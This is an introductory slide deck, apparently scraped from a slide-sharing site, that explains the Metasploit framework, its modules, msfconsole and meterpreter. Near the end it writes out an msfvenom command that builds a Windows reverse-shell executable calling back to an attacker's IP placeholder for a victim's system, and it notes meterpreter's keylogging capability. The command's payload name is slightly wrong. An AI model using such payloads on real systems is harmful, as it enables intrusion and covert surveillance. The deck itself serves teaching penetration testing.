際際滷

際際滷Share a Scribd company logo
Metasploit
Metasploit
 Metasploit is an open source, freely available
framework that is used by professionals.
 For vulnerability scanning & penetration testing.
 Development of exploits, Payloads.
Why Metasploit ?
 It provides the end to end framework for
penetration testing
 Information gathering
 Vulnerability scanning
 Pre & post Exploitation
 Exploit Development
METASPLOIT ARCHITECTURE
MODULES AND LOCATIONS
Exploits
Defined as modules that use payloads
An exploit without a payload is an Auxiliary module
Payloads, Encoders, Nops
Payloads consist of code that runs remotely
Encoders ensure that payloads make it to their destination
Nops keep the payload sizes consistent
Primary ModuleTree
Located under /usr/share/metasploit-framework/modules/
Vulnerability
The word vulnerability, in computer security, refers
to a weakness in a system allowing an attacker to
violate the confidentiality, integrity, availability
EXPLOIT =Vulnerability + Payload;
MSF Console
 The msfconsole is probably the most
popular interface to the Metasploit
Framework (MSF). It provides an allin-one
centralized console and allows you efficient
access to virtually all of the options
available in the MSF.
 To find the vulnerabilities like open ports,
reverse tcp ports.
MSF console
MSF options
Setting LHOST & LPORT
Set payload
 Set payload windows/meterpreter/reverse_tcp
 Meterpreter and shell
 The meterpreter is simply an advanced payload(stages)
included in the metasploit framwork. It is an extensible
payload with a lot of features, like it can be used for
key logging, getid, snapshots from remote desktop when
connected.
Exploiting Windows
 The concept of exploiting a vulnerability on Linux or
Windows OS remains same.
 For this we need MSFVENOM to generate an executable
with specific options and payload that can be executed in
victims system
 COMMAND
 Msfvenom -p windows/Meterpreter/reverse_shell
LHOST=<Attackers IP> LPORT = < Attackers port> -f exe
/usr/bin/shell.exe
 -p for specific payload used
 -f for which foemat using exe, pdf.
Meterpreter
ThankYou

More Related Content

Metasploit framework in Network Security

  • 2. Metasploit Metasploit is an open source, freely available framework that is used by professionals. For vulnerability scanning & penetration testing. Development of exploits, Payloads.
  • 3. Why Metasploit ? It provides the end to end framework for penetration testing Information gathering Vulnerability scanning Pre & post Exploitation Exploit Development
  • 4. METASPLOIT ARCHITECTURE MODULES AND LOCATIONS Exploits Defined as modules that use payloads An exploit without a payload is an Auxiliary module Payloads, Encoders, Nops Payloads consist of code that runs remotely Encoders ensure that payloads make it to their destination Nops keep the payload sizes consistent Primary ModuleTree Located under /usr/share/metasploit-framework/modules/
  • 5. Vulnerability The word vulnerability, in computer security, refers to a weakness in a system allowing an attacker to violate the confidentiality, integrity, availability EXPLOIT =Vulnerability + Payload;
  • 6. MSF Console The msfconsole is probably the most popular interface to the Metasploit Framework (MSF). It provides an allin-one centralized console and allows you efficient access to virtually all of the options available in the MSF. To find the vulnerabilities like open ports, reverse tcp ports.
  • 10. Set payload Set payload windows/meterpreter/reverse_tcp Meterpreter and shell The meterpreter is simply an advanced payload(stages) included in the metasploit framwork. It is an extensible payload with a lot of features, like it can be used for key logging, getid, snapshots from remote desktop when connected.
  • 11. Exploiting Windows The concept of exploiting a vulnerability on Linux or Windows OS remains same. For this we need MSFVENOM to generate an executable with specific options and payload that can be executed in victims system COMMAND Msfvenom -p windows/Meterpreter/reverse_shell LHOST=<Attackers IP> LPORT = < Attackers port> -f exe /usr/bin/shell.exe -p for specific payload used -f for which foemat using exe, pdf.